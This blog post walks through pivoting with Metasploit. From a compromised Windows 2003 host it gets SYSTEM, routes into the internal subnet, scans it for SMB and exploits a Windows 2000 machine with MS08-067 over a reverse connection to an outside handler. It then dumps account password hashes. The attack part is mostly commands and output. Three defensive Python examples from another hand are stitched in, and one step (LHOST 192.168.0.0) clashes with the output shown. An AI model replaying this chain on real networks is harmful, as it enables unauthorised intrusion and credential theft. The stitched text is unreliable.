A worked example of pivoting with Metasploit
程序员文章站
2022-06-15 22:19:46
First, by whatever means and with whatever technique, get a shell on the box (a SYSTEM-level shell) and establish a Meterpreter session.
meterpreter > getprivs
============================================================
Enabled Process Privileges
============================================================
SeDebugPrivilege
SeIncreaseQuotaPrivilege
SeSecurityPrivilege
SeTakeOwnershipPrivilege
SeLoadDriverPrivilege
SeSystemProfilePrivilege
SeSystemtimePrivilege
SeProfileSingleProcessPrivilege
SeIncreaseBasePriorityPrivilege
SeCreatePagefilePrivilege
SeBackupPrivilege
SeRestorePrivilege
SeShutdownPrivilege
SeSystemEnvironmentPrivilege
SeChangeNotifyPrivilege
SeRemoteShutdownPrivilege
SeUndockPrivilege
SeManageVolumePrivilege
meterpreter > getsystem
...got system (via technique 1).
Next, look at the local IP configuration.
meterpreter > ipconfig /all
Interface 1
============
Name : MS TCP Loopback interface
Hardware MAC : 00:00:00:00:00:00
MTU : 1520
IPv4 Address : 127.0.0.1
IPv4 Netmask : 255.0.0.0
Interface 65539
============
Name : Intel(R) PRO/1000 MT Network Connection
Hardware MAC : 00:0c:29:cd:69:e8
MTU : 1500
IPv4 Address : 192.168.0.116
IPv4 Netmask : 255.255.255.0
Then get the local subnet layout.
meterpreter > run get_local_subnets
Local subnet: 192.168.0.0/255.255.255.0
OK, now let's add the local subnet and gateway, creating a virtual route inside the session.
meterpreter > run autoroute -h
Get a list of local subnets based on the host's routes
USAGE: run get_local_subnets
OPTIONS:
-D Delete all routes (does not require a subnet)
-d Delete the named route instead of adding it
-h Help and usage
-n <opt> Netmask (IPv4, for example, 255.255.255.0
-p Print active routing table. All other options are ignored
-s <opt> Subnet (IPv4, for example, 10.10.10.0)
No need to explain further, everyone can read that; let's add the subnet and netmask.
meterpreter > run autoroute -s 192.168.0.0/24
[*] Adding a route to 192.168.0.0/255.255.255.0...
[+] Added route to 192.168.0.0/255.255.255.0 via xxx.24y.x7.50
[*] Use the -p option to list all active routes
The route is added automatically; now let's check what was assigned.
meterpreter > run autoroute -p
Active Routing Table
====================
Subnet Netmask Gateway
------ ------- -------
192.168.0.0 255.255.255.0 Session 1
Created successfully: the current session now acts as a virtual routing client. Background the current session.
meterpreter >
Background session 1? [y/N]
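To make clear what the `autoroute -s` / `autoroute -p` steps above actually set up, here is an added teaching example (not code from the original post and not Metasploit's own routing code): a small model of the per-session routing table, with a `lookup` that answers the question "which session does a connection to host X get tunnelled through?". It reproduces the state on the page (192.168.0.0/24 via session 1) and also shows the longest-prefix rule for overlapping routes, which the page does not exercise. The `SessionRouter` class name and the `walkthrough` function are my own assumptions.

```python
import ipaddress
from dataclasses import dataclass
from typing import List, Optional


@dataclass(frozen=True)
class Route:
    network: ipaddress.IPv4Network   # subnet + netmask, as 'autoroute -p' prints them
    session: int                     # id of the meterpreter session acting as the gateway


class SessionRouter:
    """Model of the per-session routing table that 'run autoroute' populates.
    Assumption: a teaching re-implementation that mirrors the observable behaviour,
    not Metasploit's Rex::Socket::SwitchBoard code."""

    DEFAULT_NETMASK = "255.255.255.0"   # autoroute's default when -n is omitted

    def __init__(self) -> None:
        self.routes: List[Route] = []

    @staticmethod
    def _to_network(subnet: str, netmask: Optional[str]) -> ipaddress.IPv4Network:
        # accept both '192.168.0.0/24' (used on the page) and '192.168.0.0' + '255.255.255.0'
        if "/" in subnet:
            return ipaddress.IPv4Network(subnet, strict=False)
        mask = netmask or SessionRouter.DEFAULT_NETMASK
        return ipaddress.IPv4Network(f"{subnet}/{mask}", strict=False)

    def add(self, subnet: str, session: int, netmask: Optional[str] = None) -> bool:
        """Add a route; returns False if that subnet is already routed (no duplicate rows)."""
        net = self._to_network(subnet, netmask)
        if any(r.network == net for r in self.routes):
            return False
        self.routes.append(Route(net, session))
        return True

    def delete(self, subnet: str, netmask: Optional[str] = None) -> bool:
        """Remove the named route (the -d option)."""
        net = self._to_network(subnet, netmask)
        before = len(self.routes)
        self.routes = [r for r in self.routes if r.network != net]
        return len(self.routes) != before

    def flush(self) -> None:
        """Remove every route (the -D option)."""
        self.routes.clear()

    def lookup(self, host: str) -> Optional[int]:
        """Session id that a connection to `host` is tunnelled through, or None when no
        route matches and the attacker host's own network stack would be used."""
        addr = ipaddress.IPv4Address(host)
        matches = [r for r in self.routes if addr in r.network]
        if not matches:
            return None
        # when routes overlap, the most specific (longest prefix) one wins
        return max(matches, key=lambda r: r.network.prefixlen).session

    def table(self) -> List[tuple]:
        """Rows in the same Subnet / Netmask / Gateway layout as 'autoroute -p'."""
        return [(str(r.network.network_address), str(r.network.netmask), f"Session {r.session}")
                for r in self.routes]


def walkthrough() -> dict:
    """Reproduces the routing state from the page: one /24 routed through session 1."""
    router = SessionRouter()
    router.add("192.168.0.0/24", session=1)
    return {
        "table": router.table(),
        "win2000_box": router.lookup("192.168.0.128"),   # internal target -> via session 1
        "outside": router.lookup("198.51.100.7"),         # not routed -> None (direct)
        "duplicate_refused": router.add("192.168.0.0", session=1, netmask="255.255.255.0"),
    }


if __name__ == "__main__":
    for row in walkthrough()["table"]:
        print("%-15s %-15s %s" % row)
```

The point for a defender: every connection the framework makes to 192.168.0.0/24 is sourced from the pivot host (192.168.0.116) itself, so on the internal network the whole later scan and exploit look like traffic from one already-compromised peer, not from an outside address.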
Scan the target network for SMB version information, to learn something about the machines that have SMB open.
msf auxiliary(smb_version) > run
[*] Scanned 029 of 256 hosts (011% complete)
[*] Scanned 052 of 256 hosts (020% complete)
[*] Scanned 079 of 256 hosts (030% complete)
[*] 192.168.0.101:445 is running Windows 7 Ultimate 7601 Service Pack (Build 1) (language: Unknown) (name:AV-PC) (domain:AV-PC)
[*] 192.168.0.100:445 is running Windows 7 Ultimate 7601 Service Pack (Build 1) (language: Unknown) (name:USERCHI-4JSMNL8) (domain:WORKGROUP)
[*] Scanned 103 of 256 hosts (040% complete)
[*] 192.168.0.116:445 is running Windows 2003 Service Pack 2 (language: Unknown) (name:MILSEC) (domain:WORKGROUP)
[*] 192.168.0.127:445 is running Windows 2003 Service Pack 2 (language: Unknown) (name:MILSEC) (domain:WORKGROUP)
[*] 192.168.0.128:445 is running Windows 2000 Service Pack 4 with MS05-010+ (language: Chinese - Traditional) (name:J86PG7C8XQQPZDD) (domain:雨薇在线)
[*] Scanned 128 of 256 hosts (050% complete)
[*] Scanned 154 of 256 hosts (060% complete)
[*] Scanned 180 of 256 hosts (070% complete)
[*] Scanned 205 of 256 hosts (080% complete)
[*] Scanned 231 of 256 hosts (090% complete)
[*] Scanned 256 of 256 hosts (100% complete)
[*] Auxiliary module execution completed
Luck is on our side: there is a Windows 2000 Server box on the internal network. Let's try MS08-067; it should be able to take it down.
msf exploit(handler) > use exploit/windows/smb/ms08_067_netapi
msf exploit(ms08_067_netapi) > set LHOST 192.168.0.0
LHOST => 192.168.0.0
msf exploit(ms08_067_netapi) > set LPORT 9988
LPORT => 9988
msf exploit(ms08_067_netapi) > set RHOST 192.168.0.128
RHOST => 192.168.0.128
msf exploit(ms08_067_netapi) > exploit
[*] Started reverse handler on xx.xy.xxy.131:9988
[*] Automatically detecting the target...
[*] Fingerprint: Windows 2000 - Service Pack 4 with MS05-010+ - lang:Chinese - Traditional
[*] Selected Target: Windows 2000 Universal
[*] Attempting to trigger the vulnerability...
[*] Sending stage (752128 bytes) to yyy.yxy.xyx.154
[*] Meterpreter session 2 opened (xx.xy.xxy.131:9988 -> yyy.yxy.xyx.154:33303) at Sat Mar 24 00:42:30 +0400 2012
meterpreter >
Two lucky hits in a row; time to buy a lottery ticket. The overflow succeeded, now let's look at the IP.
meterpreter > ipconfig
Interface 1
============
Name : MS TCP Loopback interface
Hardware MAC : 00:00:00:00:00:00
MTU : 1500
IPv4 Address : 127.0.0.1
IPv4 Netmask : 255.0.0.0
Interface 16777219
============
Name : AMD PCNET Family Ethernet Adapter
Hardware MAC : 00:0c:29:5f:c6:cd
MTU : 1500
IPv4 Address : 192.168.0.128
IPv4 Netmask : 255.255.255.0
Right, this really is an internal machine on the target's network; note the IP differs from the one above.
Now grab the hashes, dear:
meterpreter > hashdump
Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
IUSR_J86PG7C8XQQPZDD:1001:f1e39dbd0be340d11146fdf88178ba65:be3c0db67905a8e99a381dd109586c17:::
IWAM_J86PG7C8XQQPZDD:1002:2cc6fe6448db8c5f60b62c4796bb3088:2ea4c2826f40da7d5e7d67f001aae9d0:::
TsInternetUser:1000:2d705216336fe3b01ff234d2818fa846:0d834ee5cfa4b88ac3978002e3acadec:::
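What a defender should read out of a dump like the one above is credential hygiene, not crackable material. The following is an added example (not part of the original post) that parses `user:rid:lmhash:nthash:::` records and reports the findings an auditor would act on: blank passwords, accounts whose LM hash is still stored, and password reuse across accounts. The two constants are the well-known hashes of an empty password (they are the values visible in the Administrator and Guest lines); the sample input is the page's own five lines, and the function names are my own.

```python
from collections import defaultdict
from typing import Dict, List

# Well-known hashes of an empty password; both appear verbatim in the dump above.
EMPTY_LM = "aad3b435b51404eeaad3b435b51404ee"   # LM hash of "" (also printed when no LM hash is stored)
EMPTY_NT = "31d6cfe0d16ae931b73c59d7e0c089c0"   # NT hash of ""

# Sample input: the five records printed by hashdump on the page.
SAMPLE_DUMP = """\
Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
IUSR_J86PG7C8XQQPZDD:1001:f1e39dbd0be340d11146fdf88178ba65:be3c0db67905a8e99a381dd109586c17:::
IWAM_J86PG7C8XQQPZDD:1002:2cc6fe6448db8c5f60b62c4796bb3088:2ea4c2826f40da7d5e7d67f001aae9d0:::
TsInternetUser:1000:2d705216336fe3b01ff234d2818fa846:0d834ee5cfa4b88ac3978002e3acadec:::
"""


def parse_pwdump_line(line: str) -> dict:
    """Parse one 'user:rid:lmhash:nthash:::' record; raises ValueError on malformed input."""
    fields = line.strip().split(":")
    if len(fields) < 4:
        raise ValueError(f"not a pwdump record: {line!r}")
    user, rid, lm, nt = fields[:4]
    if len(lm) != 32 or len(nt) != 32:
        raise ValueError(f"hash fields must be 32 hex chars: {line!r}")
    return {"user": user, "rid": int(rid), "lm": lm.lower(), "nt": nt.lower()}


def audit_dump(text: str) -> Dict[str, List[str]]:
    """Return, per account, the credential-hygiene findings a defender would act on."""
    records = [parse_pwdump_line(line) for line in text.splitlines() if line.strip()]
    findings: Dict[str, List[str]] = {r["user"]: [] for r in records}

    # group non-empty NT hashes to spot the same password set on several accounts
    by_nt: Dict[str, List[str]] = defaultdict(list)
    for r in records:
        if r["nt"] != EMPTY_NT:
            by_nt[r["nt"]].append(r["user"])

    for r in records:
        if r["nt"] == EMPTY_NT:
            # hashdump does not show whether the account is disabled; confirm against account status
            findings[r["user"]].append("blank password")
        if r["lm"] != EMPTY_LM:
            # a real LM hash means the host still stores the weak LM form (NoLMHash not enforced)
            findings[r["user"]].append("LM hash stored")
        if r["rid"] == 500 and r["nt"] == EMPTY_NT:
            findings[r["user"]].append("built-in Administrator (RID 500) has no password")
        others = [u for u in by_nt.get(r["nt"], []) if u != r["user"]]
        if others:
            findings[r["user"]].append("same password as " + ", ".join(sorted(others)))
    return findings


if __name__ == "__main__":
    for user, issues in audit_dump(SAMPLE_DUMP).items():
        print(f"{user:24s} {'; '.join(issues) or 'no findings'}")
```

Run against the page's dump this reports blank passwords on Administrator and Guest and stored LM hashes on the three service accounts, which is exactly the kind of finding a Windows 2000 host of that era would produce and the first thing to fix (or, for a host this old, the reason to retire it).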
Background it and take a look.
meterpreter >
Background session 2? [y/N]
msf exploit(ms08_067_netapi) > sessions -l
Active sessions
===============
Id Type Information Connection
-- ---- ----------- ----------
1 meterpreter x86/win32 MILSEC\Administrator @ MILSEC xx.xy.xxy.131:5546 -> xxx.24y.57.50:30310 (192.168.0.116)
2 meterpreter x86/win32 NT AUTHORITY\SYSTEM @ J86PG7C8XQQPZDD xx.xy.xxy.131:9988 -> xxx.24x.148.154:33303 (192.168.0.128)
msf exploit(ms08_067_netapi) >
Dear, two different internal IPs and two different external IPs: proof that these are two different machines exploited through the same pivot environment.
On Linux this needs root privileges to run, otherwise autoroute will have problems. I'll talk about Linux tomorrow; I hope this is of some help when you do internal network audits...
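Seen from the network, the session list above has a distinctive footprint: the pivot host (192.168.0.116) makes a burst of 445/tcp connections to its whole /24, and both it and the second victim hold outbound connections to one external address on high, non-standard ports (5546 and 9988). The following is an added detection example (not part of the original post) that runs these two checks over constructed flow records and correlates them. The flow format, thresholds and all sample addresses are my assumptions; 203.0.113.131 is a documentation-range placeholder standing in for the obfuscated external host on the page.

```python
import ipaddress
from collections import defaultdict
from typing import Dict, Iterable, List, Set, Tuple

INTERNAL_NET = ipaddress.IPv4Network("192.168.0.0/24")   # the subnet routed through the pivot on the page
SWEEP_THRESHOLD = 20                                       # distinct 445/tcp targets from one source before alerting
EXPECTED_EGRESS_PORTS = {53, 80, 123, 443}                 # outbound ports treated as ordinary for a workstation


def build_sample_flows() -> List[str]:
    """Constructed flow records in 'epoch,src,dst,dport' form (not real logs)."""
    rows = [
        "1332540000,192.168.0.100,192.168.0.116,445",    # ordinary file-share access
        "1332540005,192.168.0.101,203.0.113.5,443",      # ordinary HTTPS egress
        "1332540010,192.168.0.116,203.0.113.131,5546",   # pivot host's reverse connection
        "1332540150,192.168.0.128,203.0.113.131,9988",   # second victim's reverse connection
    ]
    # the SMB sweep: the pivot host touches 25 neighbours on 445 within a few seconds
    rows += [f"{1332540020 + i},192.168.0.116,192.168.0.{i + 1},445" for i in range(25)]
    return rows


def parse_flows(lines: Iterable[str]) -> List[dict]:
    flows = []
    for line in lines:
        if not line.strip() or line.startswith("#"):
            continue
        ts, src, dst, dport = line.strip().split(",")
        flows.append({"ts": int(ts), "src": src, "dst": dst, "dport": int(dport)})
    return flows


def detect_smb_sweeps(flows: List[dict], threshold: int = SWEEP_THRESHOLD,
                      window: int = 60) -> Dict[str, int]:
    """Sources that hit at least `threshold` distinct internal hosts on 445/tcp
    inside one `window`-second bucket; returns the largest bucket count per source."""
    targets: Dict[Tuple[str, int], Set[str]] = defaultdict(set)
    for f in flows:
        if f["dport"] == 445 and ipaddress.IPv4Address(f["dst"]) in INTERNAL_NET:
            targets[(f["src"], f["ts"] // window)].add(f["dst"])
    out: Dict[str, int] = {}
    for (src, _), seen in targets.items():
        if len(seen) >= threshold:
            out[src] = max(out.get(src, 0), len(seen))
    return out


def detect_unusual_egress(flows: List[dict]) -> Set[Tuple[str, str, int]]:
    """Internal hosts reaching external addresses on ports outside the expected set."""
    hits: Set[Tuple[str, str, int]] = set()
    for f in flows:
        src, dst = ipaddress.IPv4Address(f["src"]), ipaddress.IPv4Address(f["dst"])
        if src in INTERNAL_NET and dst not in INTERNAL_NET and f["dport"] not in EXPECTED_EGRESS_PORTS:
            hits.add((f["src"], f["dst"], f["dport"]))
    return hits


def correlate(flows: List[dict]) -> Set[str]:
    """Hosts that both swept SMB and hold an unusual outbound connection: the pivot's signature."""
    sweepers = set(detect_smb_sweeps(flows))
    egress_hosts = {src for src, _, _ in detect_unusual_egress(flows)}
    return sweepers & egress_hosts


if __name__ == "__main__":
    flows = parse_flows(build_sample_flows())
    print("SMB sweeps:", detect_smb_sweeps(flows))
    print("unusual egress:", sorted(detect_unusual_egress(flows)))
    print("likely pivot hosts:", correlate(flows))
```

On the sample this flags 192.168.0.116 as the sweeper, both reverse connections as unusual egress, and 192.168.0.116 as the host doing both. The second victim (192.168.0.128) shows up only in the egress check, which is the practical lesson: once one host is pivoting, the intrusion is found by egress anomalies and lateral 445 fan-out from an internal peer, not by anything crossing the perimeter inbound.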
Author: 一不小心高潮了